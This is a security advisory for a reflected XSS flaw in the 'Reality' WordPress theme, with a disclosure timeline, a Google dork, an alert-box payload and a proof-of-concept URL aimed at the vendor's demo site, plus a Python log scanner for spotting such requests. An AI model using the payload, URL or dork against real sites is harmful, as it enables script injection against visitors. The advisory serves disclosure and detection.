
Reality < 2.5.3 - Unauthenticated Reflected XSS

Description

A reflected XSS vulnerability was discovered in the «Reality | Estate Multipurpose WordPress Theme». Tested version: v2.5.1.

Edit (WPScanTeam):
January 16th, 2020 - Report Received & Envato Contacted
January 17th, 2020 - Envato Investigating
February 6th, 2020 - Envato Contacted Again for Updates
February 7th, 2020 - Author is not responding to Envato, theme has been disabled on the Marketplace. Disclosing the issue.
March 18th, 2020 - v2.5.3 released

Proof of Concept

----[]- Info: -[]----
Demo website: http://reality.inwavethemes.com/
Google Dork: /wp-content/themes/reality/


----[]- Reflected XSS: -[]----
Payload Sample: "><img src=x onerror=(alert)(`m0ze`);//">

PoC: http://reality.inwavethemes.com/properties/?status=&keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(`m0ze`);//%22%3E&type=&from-year=&to-year=&min-price=&max-price=&bathrooms=&bedrooms=&garages=&min-garages_size=&max-garages_size=&min-land_size=&max-land_size=
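
To check whether a site running an affected version received requests shaped like this PoC, the search parameters can be decoded from the web server's access log and tested for markup. The Python below is an added example, not part of the original advisory or the theme's code; it assumes combined-format access logs, and the sample entries (IP addresses, timestamps, sizes) are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let a reflected value close an attribute or open a tag.
MARKUP_RE = re.compile(r'[<>"]')
SEARCH_PATH = "/properties/"  # search endpoint taken from the PoC URL

# Constructed sample entries: benign search, PoC-shaped, double-encoded.
SAMPLE_LOG = [
    '203.0.113.7 - - [07/Feb/2020:10:00:00 +0000] "GET /properties/?status=&keyword=villa&type= HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/Feb/2020:10:01:00 +0000] "GET /properties/?status=&keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(`m0ze`);//%22%3E&type= HTTP/1.1" 200 5311',
    '203.0.113.9 - - [07/Feb/2020:10:02:00 +0000] "GET /properties/?keyword=%2522%253E%253Cimg%2520src%253Dx HTTP/1.1" 200 5290',
]


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is also caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return {param: decoded value} for search parameters carrying markup."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return {}
    url = urlsplit(match.group(1))
    if not url.path.startswith(SEARCH_PATH):
        return {}
    hits = {}
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        decoded = fully_decode(value)
        if MARKUP_RE.search(decoded):
            hits[name] = decoded
    return hits


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_params(line) or "clean")
```

A hit only shows that markup was sent to the search endpoint; whether it was reflected unescaped depends on the installed theme version, which should be 2.5.3 or later.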

Affects Themes

Fixed in 2.5.3


Classification

Type: XSS

Miscellaneous

Original Researcher: m0ze
Submitter: m0ze
Verified: Yes

Timeline

Publicly Published: 2020-01-16
Added: 2020-02-07
Last Updated: 2020-07-29
